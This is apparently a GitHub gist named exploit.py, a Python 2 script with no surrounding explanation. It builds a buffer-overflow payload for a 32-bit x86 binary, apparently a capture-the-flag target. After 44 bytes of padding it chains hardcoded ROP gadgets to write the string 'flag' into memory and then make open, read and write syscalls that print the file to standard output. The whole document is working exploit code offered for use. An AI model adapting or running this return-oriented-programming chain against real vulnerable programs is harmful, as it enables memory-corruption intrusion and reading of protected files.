/exploit.py
Created Nov 4, 2016
| import struct | |
| def p(value): | |
| return struct.pack('<L', value); | |
| writeable_buffer = 0x080ca004 | |
| open_addr = 0x80515f0 | |
| read_addr = 0x80516a0 | |
| write_addr = 0x8051700 | |
| pop_eax = 0x080a81d6 | |
| pop_edx = 0x08052476 | |
| pop_ebx = 0x0805249e | |
| pop_ecx_pop_ebx = 0x0805249d | |
| inc_eax = 0x0806a2ef | |
| inc_ebx = 0x08082cb0 # inc ebx; or al, -0x15; ret | |
| inc_ecx = 0x08083c16 # inc ecx; adc al, 0x39; ret | |
| mov_eax_edx = 0x08083d68 # mov [eax], edx; pop ebx; pop ebp; ret | |
| mov_edx_eax = 0x08078e71 | |
| xor_eax_eax = 0x08097a7f | |
| popret = 0x8048560 | |
| pop2ret = 0x8048893 | |
| pop3ret = 0x8048892 | |
| int_0x80 = 0x08052ba0 | |
| payload = '' | |
| payload += 'A'*44 | |
| # 1/ put "flag" in memory | |
| payload += p(pop_eax) | |
| payload += p(writeable_buffer) | |
| payload += p(pop_edx) | |
| payload += 'flag' | |
| payload += p(mov_eax_edx) | |
| payload += 'AAAA' # dummy for pop ebx | |
| payload += 'AAAA' # dummy for pop ebp | |
| # Null-terminate flag string | |
| payload += p(xor_eax_eax) | |
| payload += p(pop_edx) | |
| payload += p(writeable_buffer+0x4) | |
| payload += p(mov_edx_eax) | |
| # 2/ open file | |
| # open(pathname, flags) | |
| # eax = 0x05, ebx = filename, ecx = flags | |
| payload += p(pop_ecx_pop_ebx) | |
| payload += p(0xffffffff) # ecx = -1 | |
| payload += p(writeable_buffer) # ebx = buffer | |
| payload += p(inc_ecx) # ebx = 0 | |
| payload += p(xor_eax_eax) | |
| payload += p(inc_eax) # eax = 1 | |
| payload += p(inc_eax) # eax = 2 | |
| payload += p(inc_eax) # eax = 3 | |
| payload += p(inc_eax) # eax = 4 | |
| payload += p(inc_eax) # eax = 5 | |
| payload += p(int_0x80) # GO! | |
| # 3/ read(fd, addr, count) | |
| # eax = 0x03, ebx = fd, ecx = writeable_buffer, edx = count | |
| payload += p(pop_ecx_pop_ebx) | |
| payload += p(writeable_buffer) # ecx | |
| payload += p(0xffffffff) # ebx = -1 | |
| payload += p(inc_ebx) # ebx = 0 | |
| payload += p(inc_ebx) # ebx = 1 | |
| payload += p(inc_ebx) # ebx = 2 | |
| payload += p(inc_ebx) # ebx = 3 | |
| payload += p(xor_eax_eax) | |
| payload += p(inc_eax) # eax = 1 | |
| payload += p(inc_eax) # eax = 2 | |
| payload += p(inc_eax) # eax = 3 | |
| payload += p(pop_edx) | |
| payload += p(0x01010101) # no null bytes | |
| payload += p(int_0x80) # GO! | |
| # 4/ write(fd, addr, count) to STDOUT | |
| # eax = 0x04, ebx = fd, ecx = writeable_buffer, edx = count | |
| payload += p(pop_ecx_pop_ebx) | |
| payload += p(writeable_buffer) # ecx | |
| payload += p(0xffffffff) # ebx = -1 | |
| payload += p(inc_ebx) # ebx = 0 | |
| payload += p(inc_ebx) # ebx = 1 | |
| payload += p(xor_eax_eax) | |
| payload += p(inc_eax) # eax = 1 | |
| payload += p(inc_eax) # eax = 2 | |
| payload += p(inc_eax) # eax = 3 | |
| payload += p(inc_eax) # eax = 4 | |
| payload += p(pop_edx) | |
| payload += p(0x01010101) # no null bytes | |
| payload += p(int_0x80) # GO! | |
| payload += 'BBBB' # just crash here | |
| print payload |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment